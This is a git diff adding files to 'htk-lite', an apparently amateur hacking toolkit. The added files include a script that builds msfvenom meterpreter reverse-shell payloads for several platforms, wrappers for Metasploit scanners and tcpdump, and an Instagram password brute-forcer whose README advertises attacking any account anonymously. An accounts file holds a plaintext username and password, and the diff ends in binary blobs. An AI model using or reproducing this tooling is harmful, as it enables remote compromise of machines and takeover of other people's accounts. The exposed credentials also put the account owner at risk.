+ lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + name = raw_input("Filename: ") + if choice == "1": + payload = 'msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.exe'.format(lhost, lport, name) + os.system(payload) + if choice == "2": + payload = 'msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.apk'.format(lhost, lport, name) + os.system(payload) + if choice == "3": + payload = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost, lport, name) + os.system(payload) + if choice == "4": + payload = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost, lport, name) + os.system(payload) + if choice == "5": + payload = 'msfvenom -p ruby/shell_reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.rb'.format(lhost, lport, name) + os.system(payload) + if choice == "6": + payload = 'msfvenom -p osx/x86/vforkshell/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.app'.format(lhost, lport, name) + os.system(payload) + if choice == "7": + payload = 'msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.tar'.format(lhost, lport, name) + os.system(payload) +payload() diff --git a/htk-lite/commandlist/reboot.py b/htk-lite/commandlist/reboot.py new file mode 100644 index 0000000..5f3f7a9 --- /dev/null +++ b/htk-lite/commandlist/reboot.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def reboot(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() +reboot() diff --git a/htk-lite/commandlist/sysinfo.py b/htk-lite/commandlist/sysinfo.py new file mode 100644 index 0000000..761995e --- /dev/null +++ b/htk-lite/commandlist/sysinfo.py @@ -0,0 +1,66 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def sysinfo(): + os.system("iwconfig") + k = raw_input("\033[1mInterface:\033[0m ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system("uname -a") + os.system("whoami") +sysinfo() diff --git a/htk-lite/commandlist/terminal.py b/htk-lite/commandlist/terminal.py new file mode 100644 index 0000000..e61a2f2 --- /dev/null +++ b/htk-lite/commandlist/terminal.py @@ -0,0 +1,43 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def terminal(): + os.system("gnome-terminal") + +terminal() diff --git a/htk-lite/commandlist/traff.py b/htk-lite/commandlist/traff.py new file mode 100644 index 0000000..802b473 --- /dev/null +++ b/htk-lite/commandlist/traff.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def traff(): + os.system("iwconfig") + s = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("tcpdump -i " + s) +traff() diff --git a/htk-lite/commandlist/verscan.py b/htk-lite/commandlist/verscan.py new file mode 100644 index 0000000..a5d4ec4 --- /dev/null +++ b/htk-lite/commandlist/verscan.py @@ -0,0 +1,84 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def verscan(): + print """ +Services available: + +{0}ssh + +{1}mysql +\033[0m + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + service = raw_input("\033[1mService: \033[0m") + if service == "ssh": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + b = raw_input(G+"\033[1mTimeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system('echo "exit\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r sshver.rc') + os.system('rm -rf sshver.rc') + + if service == "mysql": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system('echo "exit\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') + except: + print "\n" +verscan() diff --git a/htk-lite/commandlist/wordlist.py b/htk-lite/commandlist/wordlist.py new file mode 100644 index 0000000..688072b --- /dev/null +++ b/htk-lite/commandlist/wordlist.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def wordlist(): + os.system("cd wordlists && cupp -i") + print Y+"wordlist saved to /root/htk-lite/wordlists \033[0m" + +wordlist() diff --git a/htk-lite/files/Instagram/Executable/instagram.py b/htk-lite/files/Instagram/Executable/instagram.py new file mode 100644 index 0000000..b953c68 --- /dev/null +++ b/htk-lite/files/Instagram/Executable/instagram.py @@ -0,0 +1,149 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Instagram bruter + +from sys import exit +from os.path import exists +from lib.bruter import Bruter +from lib.display import Display +from lib.const import credentials, modes + + +class Engine(object): + + def __init__(self, username, threads, passlist_path): + self.bruter = None + self.resume = False + self.is_alive = True + self.threads = threads + self.username = username + self.display = Display() + self.passlist_path = passlist_path + + def create_bruter(self): + self.bruter = Bruter(self.username, self.threads, + self.passlist_path) + + def get_user_resp(self): + return self.display.prompt('Would you like to resume the attack? [y/n]: ') + + def write_to_file(self, password): + with open(credentials, 'at') as f: + data = 'Username: {}\nPassword: {}\n\n'.format( + self.username.title(), password) + f.write(data) + + def start(self): + + self.create_bruter() + + while self.is_alive and not self.bruter.password_manager.session: + pass + + if not self.is_alive: + return + + if self.bruter.password_manager.session.exists: + try: + resp = self.get_user_resp() + except: + self.is_alive = False + + if resp and self.is_alive: + if resp.strip().lower() == 'y': + self.bruter.password_manager.resume = True + + try: + self.bruter.start() + except KeyboardInterrupt: + self.bruter.stop() + self.bruter.display.shutdown(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + finally: + self.stop() + + def stop(self): + if self.is_alive: + + self.bruter.stop() + self.is_alive = False + + if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: + self.bruter.display.stats_not_found(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + if self.bruter.is_found: + self.write_to_file(self.bruter.password) + self.bruter.display.stats_found(self.bruter.password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + +def args(): + enable_colors = str(input('Enable colors? (default: y) [y/n]: ')) + + if not enable_colors: + enable_colors = True + else: + if enable_colors[0].lower() == 'n': + enable_colors = False + + display = Display(is_color=enable_colors) + username = display.prompt('Enter a username: ') + + if not username: + display.warning('You can\'t leave this field empty') + display.wait() + exit() + + passlist = display.prompt('Enter the path to your password list: ') + + if not exists(passlist): + display.warning('Invalid path to password list', False) + display.wait() + exit() + + display.info('''Modes:\r + 0: => 512 passwords at a time + 1: => 256 passwords at a time + 2: => 128 passwords at a time + 3: => 64 passwords at a time + ''', False) + + mode = display.prompt('Select a mode [0, 1, 2, 3]: ', False) + + if not mode.isdigit(): + display.warning('Mode must be a number', False) + display.wait() + exit() + + mode = int(mode) + + if int(mode) > 3: + display.warning('Mode must be no more than 3', False) + display.wait() + exit() + + if int(mode) < 0: + display.warning('Mode must bot no less than 0', False) + display.wait() + exit() + + return [username, passlist, mode] + + +if __name__ == '__main__': + try: + user_input = args() + except KeyboardInterrupt: + exit() + + display = Display() + username, passlist, mode = user_input + + try: + Engine(username, modes[mode], passlist).start() + except: + pass + finally: + display.wait() + exit() diff --git a/htk-lite/files/Instagram/LICENSE b/htk-lite/files/Instagram/LICENSE new file mode 100644 index 0000000..f9d08a3 --- /dev/null +++ b/htk-lite/files/Instagram/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2018 Mohamed + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/htk-lite/files/Instagram/README.md b/htk-lite/files/Instagram/README.md new file mode 100644 index 0000000..51aff58 --- /dev/null +++ b/htk-lite/files/Instagram/README.md @@ -0,0 +1,124 @@ +# Instagram Bruter + +[![Version](https://img.shields.io/badge/version-v2.1.1-blue.svg)]() +[![Python](https://img.shields.io/badge/python-v3-blue.svg)]() +[![Discord](https://img.shields.io/discord/532621311017484307.svg)](https://discord.gg/jvhJMeb) +[![Donate](https://img.shields.io/badge/paypal-donate-yellow.svg)](https://www.paypal.me/Msheikh03) +
+**Bitcoin wallet:** 3Kr5C9t9HWwPfqzSNXeBNyRvJWw9sSLeKy +
+ +This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden. + +# NOTICE + +This project is no longer maintained; use version 3.0.0 at [here](https://github.com/Pure-L0G1C/Insta) + +### Requirements + +- Python _v3.x.x_ +- ~~Kali Linux 2.0~~ +- ~~TOR~~ + +### Install Dependencies + +``` +pip3 install -r requirements.txt +``` + +### Help + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h +usage: instagram.py [-h] [-m MODE] username wordlist + +positional arguments: + username email or username + wordlist password list + +optional arguments: + -h, --help show this help message and exit + -m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots +``` + +### Usage + +``` +python3 instagram.py -m +``` + +### Bots(Threads) + +- 4 bots: 64 passwords at a time +- 8 bots: 128 passwords at a time +- 16 bots: 256 passwords at a time +- 32 bots: 512 passwords at a time + +### Modes + +- 0: 32 bots +- 1: 16 bots +- 2: 8 bots +- 3: 4 bots + +### Chill mode + +This mode uses only 4 bots, or 64 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3 +``` + +### Moderate mode 1 + +This mode uses 8 bots, or 128 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2 +``` + +### Moderate mode 2 + +This mode uses 16 bots, or 256 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1 +``` + +### Savage mode + +This mode uses 32 bots, or 512 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0 +``` + +### If you don't specify a mode, then mode is set to 2 + +### Run + +``` +[-] Wordlist: pass.lst +[-] Username: Sami09.1 +[-] Password: 272 +[-] Complete: 45.51% +[-] Attempts: 228 +[-] Browsers: 273 +[-] Exists: True +``` + +### Stop + +``` +[-] Wordlist: pass.lst +[-] Username: Sami09.1 +[-] Password: Sami123 +[-] Complete: 62.67% +[-] Attempts: 314 +[-] Browsers: 185 +[-] Exists: True + +[!] Password Found +[+] Username: Sami09.1 +[+] Password: Sami123 +``` diff --git a/htk-lite/files/Instagram/accounts.txt b/htk-lite/files/Instagram/accounts.txt new file mode 100644 index 0000000..d9c4e02 --- /dev/null +++ b/htk-lite/files/Instagram/accounts.txt @@ -0,0 +1,6 @@ +Username: Tuf_Unkn0Wn +Password: 1NST4gr4mUN_KN0WNbaliP4SS + +Username: Tuf_Unkn0Wn +Password: 1NST4gr4mUN_KN0WNbaliP4SS + diff --git a/htk-lite/files/Instagram/database/session.db b/htk-lite/files/Instagram/database/session.db new file mode 100644 index 0000000000000000000000000000000000000000..52266e3e8ec72cb8f6ac022c7b83ae8c5390fe2d GIT binary patch literal 12288 zcmeI#y-ve05C`yc_*A9hE>(vt9$N__RZMK8$U+qbLF$1{QBZ>vDQy57i4|UpCt&W& zbi@W1$kdIY`k&{lkL^Q&ThRf zB8qkfO}?anw~4p;$GQg8ApijgKmY;|fB*y_009U<00RFe@Y-j4oiJo?Cnmcq^Kq_q zQO*4noFy_=QmA+^lET02HpHLM-wkOo6-wT!!&)&jCZ9bRErwT0p39_OEemaYQ?2Vd z8D7T8L|n*8_xJO?pFO>!V7C*8jEea*f6 3: + raise ArgumentTypeError('maximum for a mode is 3') + + if n < 0: + raise ArgumentTypeError('minimum for a mode is 0') + + return n + + +def args(): + args = ArgumentParser() + args.add_argument('username', help='email or username') + args.add_argument('passlist', help='password list') + args.add_argument('-nc', '--no-color', dest='color', + action='store_true', help='disable colors') + args.add_argument('-m', '--mode', default=2, type=valid_int, + help='modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots') + return args.parse_args() + + +if __name__ == '__main__': + + if int(python_version()[0]) < 3: + print('[!] Please use Python 3') + exit() + + arugments = args() + mode = arugments.mode + username = arugments.username + passlist = arugments.passlist + is_color = True if not arugments.color else False + Engine(username, modes[mode], passlist, is_color).start() diff --git a/htk-lite/files/Instagram/lib/__init__.py b/htk-lite/files/Instagram/lib/__init__.py new file mode 100644 index 0000000..c30328c --- /dev/null +++ b/htk-lite/files/Instagram/lib/__init__.py @@ -0,0 +1,2 @@ +# Date: 12/30/2018 +# Author: Mohamed diff --git a/htk-lite/files/Instagram/lib/__pycache__/__init__.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/__init__.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..4ca85bf98ebbffd3457b0adcb485d19cce31366d GIT binary patch literal 149 zcmZ?b<>g`kf(f%P#;OA8#~=<2FajA4KwQiMBvKfH88jLFRx%WUgb~CqJN?|$l*~l^ zqWt_4eHUjZS6w3$BNzRQl5E|a%#u|7w9K5;VtvoN;*!MlqQqSNoXjNs`1s7c%#!$c Xy@JYH95%W6DWy57b|7;<12F>tX>=oN literal 0 HcmV?d00001 diff --git a/htk-lite/files/Instagram/lib/__pycache__/bad_proxies.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/bad_proxies.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..0f8dbb8a5ceec4fd660ac4ca6dfa3a5b2bdbdca7 GIT binary patch literal 879 zcmZuvO>fgc5Z&3e9V;ZDss|7U)B_h+YK5Sh+TG`w^_%x*chK*58ICVsf1W(yjQygIo8cgMiL>6p zMKJ{#%V7k--ZI6NxME5q{8EgBa*kQxUIQKrz&yy~xg5tzR=S+0Nj<^v?Z6r>=Tig; z8-ZdYu0ZiChCIlGyQ5s?;qIyq^7^Jbh}HWw7uBFaJ8>Q1tjWR|TQP|$@ehblMQ2?d zp;IT>=?|toJofulm?tWYLtU0lI6NA>-aB}HFbqF6v%M^BlJGRmk~(}>)J=S*<2=mL zakyb-zgiey%CtxuDXDHvDi|!c??mq3FSQVoq4WF+2A^Vz1GYh(5dtgr+MoJgtmVmAb)zO97X>E{tb8zOX*qr9;`Cl#{Y( z;|><%abeJdN8rQq;a|eN4(y`*f!3ZE|0-|=<(&&hT@hX z3Ou@%BF+;jO;^giR2LaxG=F{(XKhB4aZN3-yc@NMT~oI-Ii+K^pwE5bdo~sYj&ZR& db<-N~%JDRrG&c7?BI6&nB3{rH*;mpNe*iz|yx{-< literal 0 HcmV?d00001 diff --git a/htk-lite/files/Instagram/lib/__pycache__/browser.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/browser.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..dc0aa2de2e538834c208662b9de53c02ea54cdb3 GIT binary patch literal 3192 zcmaJ@&yO3o6((m!^Gnity>?x18U&lPMXCgAwXTsvVjH&O#7vm&?=ZC-j z^Q(g$#{NZ(=JBB1K`}=Vl1V;gITMVN?o4^^2*>K~)XhENLHA^9+RA<5=Ya_FP=t9T zqC6HcXAhY4W$+!7foi{SMMs8@Sugq#UuHdCd1aO>)P6cHvXr#ou`(trWcyW@_Z<@z}atFmc zfly3v$%G@haHS*N@0jpt8>n0Lf`uShi7zvLm~wBe^3lppNCPyokCj_v9ti z9m%n^%T;i%UhyC$AnBo+{{AtFxec*$S1bXrkX$;DSO=sl8Kk#j>()7G{)()@ibjNX zL?jvh;SN4M>cv%Su8U{St1vUks94No6+s)OW%gHP)oGEQDp|#*9O|;h$T`+kutBs6 z39#7^(1r7%F<%#2Rvr38S*mrRqvmX%3z0UtAa z5RCiVH@4bxcLV0NW^hVzL65sB7Ss>XC;{j`JL4rUofmusU~jV0eZkJ0l{4|ytrb7# zoI&@Yvq>-s>$U~7^2cf@m0rdK%At*-UZj0|SJR(#M1mYy1@%Z%`HMM%Qi*{4kSSxq z5#CTr-E;L7n(&65VCs;zsMX>sbzX#^0fs~$%gKg3?x1be34mk8$X?QYMRbO{aH>#qX}?sZ53h0#C*{r)~XcQT90mu%MI$Z*d7 z%x2CL_9ec)qHqodA{-aFN)~!b*-4pJEJ_ijMvuzkRLz8+7R70%mLKGqy!GVK@~FIf z_tD+EpBx`PULJn_#e?JLkLKg$gFOA{U_0s7H)kIm=!HftT-1P?0-$nFR9S;gTNOe5 zX(K||6Pcx@{uS){O&aTu3Y`zjo@1e|T6Q(BVO&Kt(f0fra}32W;~rk0Uv)yrH(j5{ z&hlb|_;&mjcyfP$VuAk?6au~uHh@W*vyW_@IGJ%&mdgX|gdHWojzLPLq?Hb~G(cvYGXRQ+dRO`YkM`7u0yYOi=<-c=N)P+Jfj! zOflO8WED09stJ$(LW^curu`#&H#zC?nD00iG2rzoR@>1j1t&dJZ<&rV0IbDNeZ7Zt zr0^uZBL;H@l}G!9^V%3y?F`ct6jmncS!PPJ@u~g|`d(jSCmpNwbTjY{1{lgpN}uKB z#)+>E`T4c|1yeR_yIQYJU#&g)7=E*Beh51}D7{lh-)Q<^Yr*Ej_7JvUAG?uAE9~(} z(?%VUy%!Hecep6WIFYgxOd+elEYehwl7kb#GUAe5>%7RYd99u5~m?bJXtKEIFQhP*;(;Y9*;AgNGmdF7}0HPg14KtQ)p zY$kjQ1t%4wxR&+n{M|isO0M4n8M$kmaT5=u3o-`na=nt?%8{*`G|Q6lnY(gJpJ)hZ z9@$)VSi6nOi>)BattxA4X70_5!FT zAosOH{s7vdW}$V9qP!+~^b!l0 {7t-6uU5|XTwT3g__C}Z!pW|4tS?dp$ z?PrHu61QL;)o5BE+nRD;?~-_j1X0mT#@5%V`3n+V5_IlYt#n!#)tr}all>1Q=!Q`X zIxDMS}(4FO&0Z#mMyc2%E_6I6Y==>}8+Jo4yck{y_iX$Q zdR^-y;p^c{7P-CK2pkGe7Ye*xQF@kHS$rr*8dr|nv* U@MgW$+e8+IW_Lg|9h|lQ0a%s9!Tvum^Ts9(K$_0d)D zz2AFp?$qlwf#>P({_)ZJ4I%zTo%!Q}c^7Y%gJ_{;UkpSf1~QV8`l_!6PUJA}^xc6M 